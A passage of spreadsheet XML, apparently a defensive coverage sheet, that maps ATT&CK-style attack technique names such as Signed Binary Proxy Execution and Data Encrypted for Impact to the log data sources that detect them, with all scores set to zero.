        <v>0</v>
      </c>
      <c r="G216" s="14">
        <v>0</v>
      </c>
      <c r="H216" s="14">
        <v>0</v>
      </c>
      <c r="I216" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K216" s="46" t="str">
        <f>LOOKUP(A216,'REF-DataSources'!A:C)</f>
        <v>Office 365 audit logs,Authentication logs,Application logs</v>
      </c>
    </row>
    <row r="217" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A217" s="43" t="s">
        <v>342</v>
      </c>
      <c r="B217" s="41" t="str">
        <f>LOOKUP(A217,'REF-DataSources'!A:B)</f>
        <v>Signed Script Proxy Execution</v>
      </c>
      <c r="C217" s="45"/>
      <c r="D217" s="45"/>
      <c r="E217" s="45"/>
      <c r="F217" s="14">
        <v>0</v>
      </c>
      <c r="G217" s="14">
        <v>0</v>
      </c>
      <c r="H217" s="14">
        <v>0</v>
      </c>
      <c r="I217" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K217" s="46" t="str">
        <f>LOOKUP(A217,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="218" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A218" s="43" t="s">
        <v>343</v>
      </c>
      <c r="B218" s="41" t="str">
        <f>LOOKUP(A218,'REF-DataSources'!A:B)</f>
        <v>Browser Bookmark Discovery</v>
      </c>
      <c r="C218" s="45"/>
      <c r="D218" s="45"/>
      <c r="E218" s="45"/>
      <c r="F218" s="14">
        <v>0</v>
      </c>
      <c r="G218" s="14">
        <v>0</v>
      </c>
      <c r="H218" s="14">
        <v>0</v>
      </c>
      <c r="I218" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K218" s="46" t="str">
        <f>LOOKUP(A218,'REF-DataSources'!A:C)</f>
        <v>API monitoring,File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
    </row>
    <row r="219" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A219" s="43" t="s">
        <v>344</v>
      </c>
      <c r="B219" s="41" t="str">
        <f>LOOKUP(A219,'REF-DataSources'!A:B)</f>
        <v>Signed Binary Proxy Execution</v>
      </c>
      <c r="C219" s="45"/>
      <c r="D219" s="45"/>
      <c r="E219" s="45"/>
      <c r="F219" s="14">
        <v>0</v>
      </c>
      <c r="G219" s="14">
        <v>0</v>
      </c>
      <c r="H219" s="14">
        <v>0</v>
      </c>
      <c r="I219" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K219" s="46" t="str">
        <f>LOOKUP(A219,'REF-DataSources'!A:C)</f>
        <v>API monitoring,File monitoring,Binary file metadata,Process use of network,Windows Registry,Loaded DLLs,DLL monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="220" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A220" s="43" t="s">
        <v>345</v>
      </c>
      <c r="B220" s="41" t="str">
        <f>LOOKUP(A220,'REF-DataSources'!A:B)</f>
        <v>Remote Access Software</v>
      </c>
      <c r="C220" s="45"/>
      <c r="D220" s="45"/>
      <c r="E220" s="45"/>
      <c r="F220" s="14">
        <v>0</v>
      </c>
      <c r="G220" s="14">
        <v>0</v>
      </c>
      <c r="H220" s="14">
        <v>0</v>
      </c>
      <c r="I220" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K220" s="46" t="str">
        <f>LOOKUP(A220,'REF-DataSources'!A:C)</f>
        <v>Network intrusion detection system,Network protocol analysis,Process use of network,Process monitoring</v>
      </c>
    </row>
    <row r="221" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A221" s="43" t="s">
        <v>346</v>
      </c>
      <c r="B221" s="41" t="str">
        <f>LOOKUP(A221,'REF-DataSources'!A:B)</f>
        <v>XSL Script Processing</v>
      </c>
      <c r="C221" s="45"/>
      <c r="D221" s="45"/>
      <c r="E221" s="45"/>
      <c r="F221" s="14">
        <v>0</v>
      </c>
      <c r="G221" s="14">
        <v>0</v>
      </c>
      <c r="H221" s="14">
        <v>0</v>
      </c>
      <c r="I221" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K221" s="46" t="str">
        <f>LOOKUP(A221,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Process use of network,DLL monitoring</v>
      </c>
    </row>
    <row r="222" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A222" s="43" t="s">
        <v>347</v>
      </c>
      <c r="B222" s="41" t="str">
        <f>LOOKUP(A222,'REF-DataSources'!A:B)</f>
        <v>Template Injection</v>
      </c>
      <c r="C222" s="45"/>
      <c r="D222" s="45"/>
      <c r="E222" s="45"/>
      <c r="F222" s="14">
        <v>0</v>
      </c>
      <c r="G222" s="14">
        <v>0</v>
      </c>
      <c r="H222" s="14">
        <v>0</v>
      </c>
      <c r="I222" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K222" s="46" t="str">
        <f>LOOKUP(A222,'REF-DataSources'!A:C)</f>
        <v>Anti-virus,Email gateway,Network intrusion detection system,Web logs</v>
      </c>
    </row>
    <row r="223" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A223" s="43" t="s">
        <v>348</v>
      </c>
      <c r="B223" s="41" t="str">
        <f>LOOKUP(A223,'REF-DataSources'!A:B)</f>
        <v>File and Directory Permissions Modification</v>
      </c>
      <c r="C223" s="45"/>
      <c r="D223" s="45"/>
      <c r="E223" s="45"/>
      <c r="F223" s="14">
        <v>0</v>
      </c>
      <c r="G223" s="14">
        <v>0</v>
      </c>
      <c r="H223" s="14">
        <v>0</v>
      </c>
      <c r="I223" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K223" s="46" t="str">
        <f>LOOKUP(A223,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Windows event logs</v>
      </c>
    </row>
    <row r="224" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A224" s="43" t="s">
        <v>349</v>
      </c>
      <c r="B224" s="41" t="str">
        <f>LOOKUP(A224,'REF-DataSources'!A:B)</f>
        <v>Linux and Mac File and Directory Permissions Modification</v>
      </c>
      <c r="C224" s="45"/>
      <c r="D224" s="45"/>
      <c r="E224" s="45"/>
      <c r="F224" s="14">
        <v>0</v>
      </c>
      <c r="G224" s="14">
        <v>0</v>
      </c>
      <c r="H224" s="14">
        <v>0</v>
      </c>
      <c r="I224" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K224" s="46" t="str">
        <f>LOOKUP(A224,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
    </row>
    <row r="225" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A225" s="43" t="s">
        <v>350</v>
      </c>
      <c r="B225" s="41" t="str">
        <f>LOOKUP(A225,'REF-DataSources'!A:B)</f>
        <v>Execution Guardrails</v>
      </c>
      <c r="C225" s="45"/>
      <c r="D225" s="45"/>
      <c r="E225" s="45"/>
      <c r="F225" s="14">
        <v>0</v>
      </c>
      <c r="G225" s="14">
        <v>0</v>
      </c>
      <c r="H225" s="14">
        <v>0</v>
      </c>
      <c r="I225" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K225" s="46" t="str">
        <f>LOOKUP(A225,'REF-DataSources'!A:C)</f>
        <v>Process monitoring</v>
      </c>
    </row>
    <row r="226" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A226" s="43" t="s">
        <v>351</v>
      </c>
      <c r="B226" s="41" t="str">
        <f>LOOKUP(A226,'REF-DataSources'!A:B)</f>
        <v>Domain Trust Discovery</v>
      </c>
      <c r="C226" s="45"/>
      <c r="D226" s="45"/>
      <c r="E226" s="45"/>
      <c r="F226" s="14">
        <v>0</v>
      </c>
      <c r="G226" s="14">
        <v>0</v>
      </c>
      <c r="H226" s="14">
        <v>0</v>
      </c>
      <c r="I226" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K226" s="46" t="str">
        <f>LOOKUP(A226,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,API monitoring,Process command-line parameters,Process monitoring</v>
      </c>
    </row>
    <row r="227" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A227" s="43" t="s">
        <v>353</v>
      </c>
      <c r="B227" s="41" t="str">
        <f>LOOKUP(A227,'REF-DataSources'!A:B)</f>
        <v>Domain Trust Discovery</v>
      </c>
      <c r="C227" s="45"/>
      <c r="D227" s="45"/>
      <c r="E227" s="45"/>
      <c r="F227" s="14">
        <v>0</v>
      </c>
      <c r="G227" s="14">
        <v>0</v>
      </c>
      <c r="H227" s="14">
        <v>0</v>
      </c>
      <c r="I227" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K227" s="46" t="str">
        <f>LOOKUP(A227,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,API monitoring,Process command-line parameters,Process monitoring</v>
      </c>
    </row>
    <row r="228" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A228" s="43" t="s">
        <v>355</v>
      </c>
      <c r="B228" s="41" t="str">
        <f>LOOKUP(A228,'REF-DataSources'!A:B)</f>
        <v>Group Policy Modification</v>
      </c>
      <c r="C228" s="45"/>
      <c r="D228" s="45"/>
      <c r="E228" s="45"/>
      <c r="F228" s="14">
        <v>0</v>
      </c>
      <c r="G228" s="14">
        <v>0</v>
      </c>
      <c r="H228" s="14">
        <v>0</v>
      </c>
      <c r="I228" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K228" s="46" t="str">
        <f>LOOKUP(A228,'REF-DataSources'!A:C)</f>
        <v>Windows event logs</v>
      </c>
    </row>
    <row r="229" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A229" s="43" t="s">
        <v>356</v>
      </c>
      <c r="B229" s="41" t="str">
        <f>LOOKUP(A229,'REF-DataSources'!A:B)</f>
        <v>Data Destruction</v>
      </c>
      <c r="C229" s="45"/>
      <c r="D229" s="45"/>
      <c r="E229" s="45"/>
      <c r="F229" s="14">
        <v>0</v>
      </c>
      <c r="G229" s="14">
        <v>0</v>
      </c>
      <c r="H229" s="14">
        <v>0</v>
      </c>
      <c r="I229" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K229" s="46" t="str">
        <f>LOOKUP(A229,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
    </row>
    <row r="230" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A230" s="43" t="s">
        <v>357</v>
      </c>
      <c r="B230" s="41" t="str">
        <f>LOOKUP(A230,'REF-DataSources'!A:B)</f>
        <v>Data Encrypted for Impact</v>
      </c>
      <c r="C230" s="45"/>
      <c r="D230" s="45"/>
      <c r="E230" s="45"/>
      <c r="F230" s="14">
        <v>0</v>
      </c>
      <c r="G230" s="14">
        <v>0</v>
      </c>
      <c r="H230" s="14">
        <v>0</v>
      </c>
      <c r="I230" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K230" s="46" t="str">
        <f>LOOKUP(A230,'REF-DataSources'!A:C)</f>
        <v>Kernel drivers,File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
    </row>
    <row r="231" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A231" s="43" t="s">
        <v>359</v>
      </c>
      <c r="B231" s="41" t="str">
        <f>LOOKUP(A231,'REF-DataSources'!A:B)</f>
        <v>Data Encrypted for Impact</v>
      </c>
      <c r="C231" s="45"/>
      <c r="D231" s="45"/>
      <c r="E231" s="45"/>
      <c r="F231" s="14">
        <v>0</v>
      </c>
      <c r="G231" s="14">
        <v>0</v>
      </c>
      <c r="H231" s="14">
        <v>0</v>
      </c>
      <c r="I231" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K231" s="46" t="str">
        <f>LOOKUP(A231,'REF-DataSources'!A:C)</f>
        <v>Kernel drivers,File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
    </row>
    <row r="232" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A232" s="43" t="s">
        <v>360</v>
      </c>
      <c r="B232" s="41" t="str">
        <f>LOOKUP(A232,'REF-DataSources'!A:B)</f>
        <v>Data Encrypted for Impact</v>
      </c>
      <c r="C232" s="45"/>
      <c r="D232" s="45"/>
      <c r="E232" s="45"/>
      <c r="F232" s="14">
        <v>0</v>
      </c>
      <c r="G232" s="14">
        <v>0</v>
      </c>
      <c r="H232" s="14">
        <v>0</v>
      </c>
      <c r="I232" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K232" s="46" t="str">
        <f>LOOKUP(A232,'REF-DataSources'!A:C)</f>
        <v>Kernel drivers,File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
    </row>
    <row r="233" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A233" s="43" t="s">
        <v>361</v>
      </c>
      <c r="B233" s="41" t="str">
        <f>LOOKUP(A233,'REF-DataSources'!A:B)</f>
        <v>Service Stop</v>
      </c>
      <c r="C233" s="45"/>
      <c r="D233" s="45"/>
      <c r="E233" s="45"/>
      <c r="F233" s="14">
        <v>0</v>
      </c>
      <c r="G233" s="14">
        <v>0</v>
      </c>
      <c r="H233" s="14">
        <v>0</v>
      </c>
      <c r="I233" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K233" s="46" t="str">
        <f>LOOKUP(A233,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process command-line parameters,Process monitoring,Windows Registry,API monitoring</v>
      </c>
    </row>
    <row r="234" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A234" s="43" t="s">
        <v>362</v>
      </c>
      <c r="B234" s="41" t="str">
        <f>LOOKUP(A234,'REF-DataSources'!A:B)</f>
        <v>Inhibit System Recovery</v>
      </c>
      <c r="C234" s="45"/>
      <c r="D234" s="45"/>
      <c r="E234" s="45"/>
      <c r="F234" s="14">
        <v>0</v>
      </c>
      <c r="G234" s="14">
        <v>0</v>
      </c>
      <c r="H234" s="14">
        <v>0</v>
      </c>
      <c r="I234" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K234" s="46" t="str">
        <f>LOOKUP(A234,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Services,Windows event logs,Process command-line parameters,Process monitoring</v>
      </c>
    </row>
    <row r="235" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A235" s="43" t="s">
        <v>363</v>
      </c>
      <c r="B235" s="41" t="str">
        <f>LOOKUP(A235,'REF-DataSources'!A:B)</f>
        <v>Defacement</v>
      </c>
      <c r="C235" s="45"/>
      <c r="D235" s="45"/>
      <c r="E235" s="45"/>
      <c r="F235" s="14">
        <v>0</v>
      </c>
      <c r="G235" s="14">
        <v>0</v>
      </c>
      <c r="H235" s="14">
        <v>0</v>
      </c>
      <c r="I235" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K235" s="46" t="str">
        <f>LOOKUP(A235,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Web application firewall logs,Web logs,Packet capture</v>
      </c>
    </row>
    <row r="236" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A236" s="43" t="s">
        <v>364</v>
      </c>
      <c r="B236" s="41" t="str">
        <f>LOOKUP(A236,'REF-DataSources'!A:B)</f>
        <v>External Defacement</v>
      </c>
      <c r="C236" s="45"/>
      <c r="D236" s="45"/>
      <c r="E236" s="45"/>
      <c r="F236" s="14">
        <v>0</v>
      </c>
      <c r="G236" s="14">
        <v>0</v>
      </c>
      <c r="H236" s="14">
        <v>0</v>
      </c>
      <c r="I236" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K236" s="46" t="str">
        <f>LOOKUP(A236,'REF-DataSources'!A:C)</f>
        <v>Web logs,Web application firewall logs,Packet capture</v>
      </c>
    </row>
    <row r="237" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A237" s="43" t="s">
        <v>365</v>
      </c>
      <c r="B237" s="41" t="str">
        <f>LOOKUP(A237,'REF-DataSources'!A:B)</f>
        <v>External Defacement</v>
      </c>
      <c r="C237" s="45"/>
      <c r="D237" s="45"/>
      <c r="E237" s="45"/>
      <c r="F237" s="14">
        <v>0</v>
      </c>
      <c r="G237" s="14">
        <v>0</v>
      </c>
      <c r="H237" s="14">
        <v>0</v>
      </c>
      <c r="I237" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K237" s="46" t="str">
        <f>LOOKUP(A237,'REF-DataSources'!A:C)</f>
        <v>Web logs,Web application firewall logs,Packet capture</v>
      </c>
    </row>
    <row r="238" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A238" s="43" t="s">
        <v>366</v>
      </c>
      <c r="B238" s="41" t="str">
        <f>LOOKUP(A238,'REF-DataSources'!A:B)</f>
        <v>External Defacement</v>
      </c>
      <c r="C238" s="45"/>
      <c r="D238" s="45"/>
      <c r="E238" s="45"/>
      <c r="F238" s="14">
        <v>0</v>
      </c>
      <c r="G238" s="14">
        <v>0</v>
      </c>
      <c r="H238" s="14">
        <v>0</v>
      </c>
      <c r="I238" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K238" s="46" t="str">
        <f>LOOKUP(A238,'REF-DataSources'!A:C)</f>
        <v>Web logs,Web application firewall logs,Packet capture</v>
      </c>
    </row>
    <row r="239" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A239" s="43" t="s">
        <v>367</v>
      </c>
      <c r="B239" s="41" t="str">
        <f>LOOKUP(A239,'REF-DataSources'!A:B)</f>
        <v>Firmware Corruption</v>
      </c>
      <c r="C239" s="45"/>
      <c r="D239" s="45"/>
      <c r="E239" s="45"/>
      <c r="F239" s="14">
        <v>0</v>
      </c>
      <c r="G239" s="14">
        <v>0</v>
      </c>
      <c r="H239" s="14">
        <v>0</v>
      </c>
      <c r="I239" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K239" s="46" t="str">
        <f>LOOKUP(A239,'REF-DataSources'!A:C)</f>
        <v>BIOS,Component firmware</v>
      </c>
    </row>
    <row r="240" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A240" s="43" t="s">
        <v>368</v>
      </c>
      <c r="B240" s="41" t="str">
        <f>LOOKUP(A240,'REF-DataSources'!A:B)</f>
        <v>Resource Hijacking</v>
      </c>
      <c r="C240" s="45"/>
      <c r="D240" s="45"/>
      <c r="E240" s="45"/>
      <c r="F240" s="14">
        <v>0</v>
      </c>
      <c r="G240" s="14">
        <v>0</v>
      </c>
      <c r="H240" s="14">
        <v>0</v>
      </c>
      <c r="I240" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K240" s="46" t="str">
        <f>LOOKUP(A240,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,Stackdriver logs,AWS CloudTrail logs,Process use of network,Process monitoring,Network protocol analysis,Network device logs</v>
      </c>
    </row>
    <row r="241" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A241" s="43" t="s">
        <v>370</v>
      </c>
      <c r="B241" s="41" t="str">
        <f>LOOKUP(A241,'REF-DataSources'!A:B)</f>
        <v>Virtualization/Sandbox Evasion</v>
      </c>
      <c r="C241" s="45"/>
      <c r="D241" s="45"/>
      <c r="E241" s="45"/>
      <c r="F241" s="14">
        <v>0</v>
      </c>
      <c r="G241" s="14">
        <v>0</v>
      </c>
      <c r="H241" s="14">
        <v>0</v>
      </c>
      <c r="I241" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K241" s="46" t="str">
        <f>LOOKUP(A241,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="242" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A242" s="43" t="s">
        <v>371</v>
      </c>
      <c r="B242" s="41" t="str">
        <f>LOOKUP(A242,'REF-DataSources'!A:B)</f>
        <v>Network Denial of Service</v>
      </c>
      <c r="C242" s="45"/>
      <c r="D242" s="45"/>
      <c r="E242" s="45"/>
      <c r="F242" s="14">
        <v>0</v>
      </c>
      <c r="G242" s="14">
        <v>0</v>
      </c>
      <c r="H242" s="14">
        <v>0</v>
      </c>
      <c r="I242" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K242" s="46" t="str">
        <f>LOOKUP(A242,'REF-DataSources'!A:C)</f>
        <v>Sensor health and status,Network protocol analysis,Netflow/Enclave netflow,Network intrusion detection system,Network device logs</v>
      </c>
    </row>
    <row r="243" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A243" s="43" t="s">
        <v>372</v>
      </c>
      <c r="B243" s="41" t="str">
        <f>LOOKUP(A243,'REF-DataSources'!A:B)</f>
        <v>Endpoint Denial of Service</v>
      </c>
      <c r="C243" s="45"/>
      <c r="D243" s="45"/>
      <c r="E243" s="45"/>
      <c r="F243" s="14">
        <v>0</v>
      </c>
      <c r="G243" s="14">
        <v>0</v>
      </c>
      <c r="H243" s="14">
        <v>0</v>
      </c>
      <c r="I243" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K243" s="46" t="str">
        <f>LOOKUP(A243,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,Web logs,Web application firewall logs,Network intrusion detection system,Network protocol analysis,Network device logs,Netflow/Enclave netflow</v>
      </c>
    </row>
    <row r="244" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A244" s="43" t="s">
        <v>374</v>
      </c>
      <c r="B244" s="41" t="str">
        <f>LOOKUP(A244,'REF-DataSources'!A:B)</f>
        <v>Application or System Exploitation</v>
      </c>
      <c r="C244" s="45"/>
      <c r="D244" s="45"/>
      <c r="E244" s="45"/>
      <c r="F244" s="14">
        <v>0</v>
      </c>
      <c r="G244" s="14">
        <v>0</v>
      </c>
      <c r="H244" s="14">
        <v>0</v>
      </c>
      <c r="I244" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K244" s="46" t="str">
        <f>LOOKUP(A244,'REF-DataSources'!A:C)</f>
        <v>Network device logs,Network intrusion detection system,Web application firewall logs,Web logs,SSL/TLS inspection</v>
      </c>
    </row>
    <row r="245" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A245" s="43" t="s">
        <v>375</v>
      </c>
      <c r="B245" s="41" t="str">
        <f>LOOKUP(A245,'REF-DataSources'!A:B)</f>
        <v>Application or System Exploitation</v>
      </c>
      <c r="C245" s="45"/>
      <c r="D245" s="45"/>
      <c r="E245" s="45"/>
      <c r="F245" s="14">
        <v>0</v>
      </c>
      <c r="G245" s="14">
        <v>0</v>
      </c>
      <c r="H245" s="14">
        <v>0</v>
      </c>
      <c r="I245" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K245" s="46" t="str">
        <f>LOOKUP(A245,'REF-DataSources'!A:C)</f>
        <v>Network device logs,Network intrusion detection system,Web application firewall logs,Web logs,SSL/TLS inspection</v>
      </c>
    </row>
    <row r="246" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A246" s="43" t="s">
        <v>376</v>
      </c>
      <c r="F246" s="14">
        <v>0</v>
      </c>
      <c r="G246" s="14">
        <v>0</v>
      </c>
      <c r="H246" s="14">
        <v>0</v>
      </c>
      <c r="I246" s="32">
        <f t="shared" ref="I246:I267" si="6">((F246*2)+G246+(H246*2))/5</f>
        <v>0</v>
      </c>
    </row>
    <row r="247" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A247" s="43" t="s">
        <v>377</v>
      </c>
      <c r="F247" s="14">
        <v>0</v>
      </c>
      <c r="G247" s="14">
        <v>0</v>
      </c>
      <c r="H247" s="14">
        <v>0</v>
      </c>
      <c r="I247" s="32">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="248" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A248" s="43" t="s">
        <v>378</v>
      </c>
      <c r="F248" s="14">
        <v>0</v>
      </c>
      <c r="G248" s="14">
        <v>0</v>
      </c>
      <c r="H248" s="14">
        <v>0</v>
      </c>
      <c r="I248" s="32">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="249" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A249" s="43" t="s">
        <v>379</v>
      </c>
      <c r="F249" s="14">
        <v>0</v>
      </c>
      <c r="G249" s="14">
        <v>0</v>
      </c>
      <c r="H249" s="14">
        <v>0</v>
      </c>
      <c r="I249" s="32">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="250" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A250" s="43" t="s">
        <v>380</v>
      </c>
      <c r="F250" s="14">
        <v>0</v>
      </c>
      <c r="G250" s="14">
        <v>0</v>
      </c>
      <c r="H250" s="14">
        <v>0</v>
      </c>
      <c r="I250" s="32">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="251" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A251" s="43" t="s">
        <v>381</v>
      </c>
      <c r="F251" s="14">
        <v>0</v>
      </c>
      <c r="G251" s="14">
        <v>0</v>
      </c>
      <c r="H251" s="14">
        <v>0</v>
      </c>
      <c r="I251" s="32">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="252" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A252" s="43" t="s">
        <v>382</v>
      </c>
      <c r="F252" s="14">
        <v>0</v>
      </c>
      <c r="G252" s="14">
        <v>0</v>
      </c>
      <c r="H252" s="14">
        <v>0</v>
      </c>
      <c r="I252" s="32">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="253" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A253" s="43" t="s">
        <v>383</v>
      </c>
      <c r="F253" s="14">
        <v>0</v>
      </c>
      <c r="G253" s="14">
        <v>0</v>
      </c>
      <c r="H253" s="14">
        <v>0</v>
      </c>
      <c r="I253" s="32">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="254" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A254" s="43" t="s">
        <v>384</v>
      </c>
      <c r="F254" s="14">
        <v>0</v>
      </c>
      <c r="G254" s="14">
        <v>0</v>
      </c>
      <c r="H254" s="14">
        <v>0</v>
      </c>
      <c r="I254" s="32">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="255" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A255" s="43" t="s">
        <v>385</v>
      </c>
      <c r="F255" s="14">
        <v>0</v>
      </c>
      <c r="G255" s="14">
        <v>0</v>
      </c>
      <c r="H255" s="14">
        <v>0</v>
      </c>
      <c r="I255" s="32">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="256" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A256" s="43" t="s">
        <v>386</v>
      </c>
      <c r="F256" s="14">
        <v>0</v>
      </c>
      <c r="G256" s="14">
        <v>0</v>
      </c>
      <c r="H256" s="14">
        <v>0</v>
      </c>
      <c r="I256" s="32">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="257" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A257" s="43" t="s">
        <v>387</v>
      </c>
      <c r="F257" s="14">
        <v>0</v>
      </c>
      <c r="G257" s="14">
        <v>0</v>
      </c>
      <c r="H257" s="14">
        <v>0</v>
      </c>
      <c r="I257" s="32">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="258" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A258" s="43" t="s">
        <v>388</v>
      </c>
      <c r="F258" s="14">
        <v>0</v>
      </c>
      <c r="G258" s="14">
        <v>0</v>
      </c>
      <c r="H258" s="14">
        <v>0</v>
      </c>
      <c r="I258" s="32">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="259" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A259" s="43" t="s">
        <v>389</v>
      </c>
      <c r="F259" s="14">
        <v>0</v>
      </c>
      <c r="G259" s="14">
        <v>0</v>
      </c>
      <c r="H259" s="14">
        <v>0</v>
      </c>
      <c r="I259" s="32">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="260" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A260" s="43" t="s">
        <v>390</v>
      </c>
      <c r="F260" s="14">
        <v>0</v>
      </c>
      <c r="G260" s="14">
        <v>0</v>
      </c>
      <c r="H260" s="14">
        <v>0</v>
      </c>
      <c r="I260" s="32">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="261" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A261" s="43" t="s">
        <v>391</v>
      </c>
      <c r="F261" s="14">
        <v>0</v>
      </c>
      <c r="G261" s="14">
        <v>0</v>
      </c>
      <c r="H261" s="14">
        <v>0</v>
      </c>
      <c r="I261" s="32">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="262" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A262" s="43" t="s">
        <v>392</v>
      </c>
      <c r="F262" s="14">
        <v>0</v>
      </c>
      <c r="G262" s="14">
        <v>0</v>
      </c>
      <c r="H262" s="14">
        <v>0</v>
      </c>
      <c r="I262" s="32">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="263" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A263" s="43" t="s">
        <v>393</v>
      </c>
      <c r="F263" s="14">
